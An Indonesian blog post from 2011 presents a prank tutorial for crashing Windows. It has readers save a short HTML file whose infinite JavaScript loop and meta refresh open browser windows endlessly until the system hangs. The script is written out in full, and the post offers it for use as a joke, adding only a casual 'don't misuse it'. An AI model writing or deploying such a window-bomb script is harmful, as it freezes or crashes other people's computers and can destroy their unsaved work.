11 Mar 2011

Cara membuat windows menjadi blank dengan menggunakan javascript

Yups posting Komupdate kali ini tentang usil lagi deh.. bagaimana cara membuat windows menjadi blank alias error, tapi dengan cara java Script. Ini merupakan lelucon kecil, tapi juga membuat mood jadi serius, karena komputernya jadi gila. Kita akan memanfaatkan Java Script dengan membuka browser Internet Explorer, sehingga nanti Internet Explorer akan keluar terus menerus membuat /membuka tab jendela duplikat internet explore secara tak terbatas. Upss.. sampai komputernya ga kuat nampung dan crotttt jadi blank..hoho
Penasaran? yuk ikuti lagi caranya ..





OK..cara nya:
1. Buka notepad
2. Lihat dan copy script di bawah, kemudian paste di notepad

<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=index.html">
<SCRIPT LANGUAGE="JavaScript">
<!--
for (x=0;x<1;x)
open("index.html");
</SCRIPT>
</HEAD>
</body>
</HTML>


3. Kemudian simpan dengan nama index.html dan jalankan dengan Browser Internet Explore.
4. Selesai deh :p


Nah, ketika file index.html tersebut dijalankan (di klik), maka komputer akan membuka banyak sekali jendela browser sampai tak terhingga banyaknya hingga windows hang atau crash!! boommmmm ..woww...lu sinting brooo

+ Kok bisa begitu Boz??

- Instruksi dari javascript diatas adalah perintah untuk memanggil diri sendiri tanpa berhenti dengan sangat cepat.

+ Trus fungsi nya apa buat kaya gt?


- Ya terserah kamu mau buat apa, yang penting Komupdate kasih caranya, dan jangan untuk macam2..:p

+ Lu gila ya bro?

- Emang gue gilaaaa.kwkwkwk


Jika ada saran, komentar dan kritik, atau bahkan request. Jangan lupa isi komentar di bawah ya..sangat diharapkan. Thanks

0 Komentar:

Posting Komentar

Sisihkan waktu Anda untuk berkomentar di Blog Saya karna komentar Anda sangat berguna Buat kemajuan Blog Saya....
Bagi Yang Ingin Berkomentar Silahkan Pilih Anonymous / Anonim apabila tidak punya akun google.. Terima Kasih !!

Komupdate Community

Add Facebook Aku Ya..

About Me

Foto Saya
Andi Dani Angga
Saya seorang siswa yang bersekolah di sma negeri 1 banda aceh... dan tepatnya kelas 2 sma dan umur saya 17 tahun... kegiatan-kegiatan yang saya lalui biasanya ngeblog, komputer, online, gamer, sholat, dan tidak lupa belajar... Sekian Profil Dari Saya Salam... Admin Komupdate
Lihat profil lengkapku

Translate This Blog


Please Don't Talk About SPAM Or Sara
By : Admin Komupdate